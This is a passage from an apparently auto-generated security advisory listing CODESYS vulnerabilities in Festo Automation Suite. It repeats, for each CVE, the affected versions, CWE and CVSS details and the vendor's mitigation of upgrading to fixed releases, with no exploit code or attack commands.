(3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-47390 An authenticated, remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-787 Out-of-bounds Write Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H CVE-2022-47391 In multiple CODESYS products in multiple versions an unauthorized, remote attacker may use a improper input validation vulnerability to read from invalid addresses leading to a denial of service. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVE-2022-47392 An authenticated, remote attacker may use a improper input validation vulnerability in the CmpApp/CmpAppBP/CmpAppForce Components of multiple CODESYS products in multiple versions to read from an invalid address which can lead to a denial-of-service condition. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2022-47393 An authenticated, remote attacker may use a Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in multiple versions of multiple CODESYS products to force a denial-of-service situation. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2023-3662 In CODESYS Development System versions from 3.5.17.0 and prior to 3.5.19.20 a vulnerability allows for execution of binaries from the current working directory in the users context . View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-427 Uncontrolled Search Path Element Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.3 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H CVE-2023-3663 In CODESYS Development System versions from 3.5.11.20 and before 3.5.19.20 a missing integrity check might allow an unauthenticated remote attacker to manipulate the content of notifications received via HTTP by the CODESYS notification server. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-940 Improper Verification of Source of a Communication Channel Metrics CVSS Version Base Score Base Severity Vector String 3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H CVE-2023-3669 A missing Brute-Force protection in CODESYS Development System prior to 3.5.19.20 allows a local attacker to have unlimited attempts of guessing the password within an import dialog. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-307 Improper Restriction of Excessive Authentication Attempts Metrics CVSS Version Base Score Base Severity Vector String 3.1 3.3 LOW CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N CVE-2023-3670 In CODESYS Development System 3.5.9.0 to 3.5.17.0 and CODESYS Scripting 4.0.0.0 to 4.1.0.0 unsafe directory permissions would allow an attacker with local access to the workstation to place potentially harmful and disguised scripts that could be executed by legitimate users. View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-668 Exposure of Resource to Wrong Sphere Metrics CVSS Version Base Score Base Severity Vector String 3.1 7.3 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H CVE-2023-37545 In multiple Codesys products in multiple versions, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37546, CVE-2023-37547, CVE-2023-37548, CVE-2023-37549, CVE-2023-37550 View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2023-37546 In multiple Codesys products in multiple versions, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37545, CVE-2023-37547, CVE-2023-37548, CVE-2023-37549 and CVE-2023-37550 View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2023-37547 In multiple Codesys products in multiple versions, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37545, CVE-2023-37546, CVE-2023-37548, CVE-2023-37549 and CVE-2023-37550 View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2023-37548 In multiple Codesys products in multiple versions, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37545, CVE-2023-37546, CVE-2023-37547, CVE-2023-37549 and CVE-2023-37550 View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo. Mitigation The following product versions have been fixed: Mitigation CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json Mitigation For more information see the associated Festo SE & Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML. https://certvde.com/en/advisories/VDE-2025-108 Relevant CWE: CWE-20 Improper Input Validation Metrics CVSS Version Base Score Base Severity Vector String 3.1 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H CVE-2023-37549 In multiple Codesys products in multiple versions, after successful authentication as a user, specific crafted network communication requests with inconsistent content can cause the CmpApp component to read internally from an invalid address, potentially leading to a denial-of-service condition. This vulnerability is different to CVE-2023-37545, CVE-2023-37546, CVE-2023-37547, CVE-2023-37548 and CVE-2023-37550 View CVE Details Affected Products CODESYS in Festo Automation Suite Vendor: FESTO, CODESYS Product Version: FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/* Product Status: known_affected Remediations Mitigation FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk: Mitigation Starting from Festo Automation Suite version 2.8.0.138, 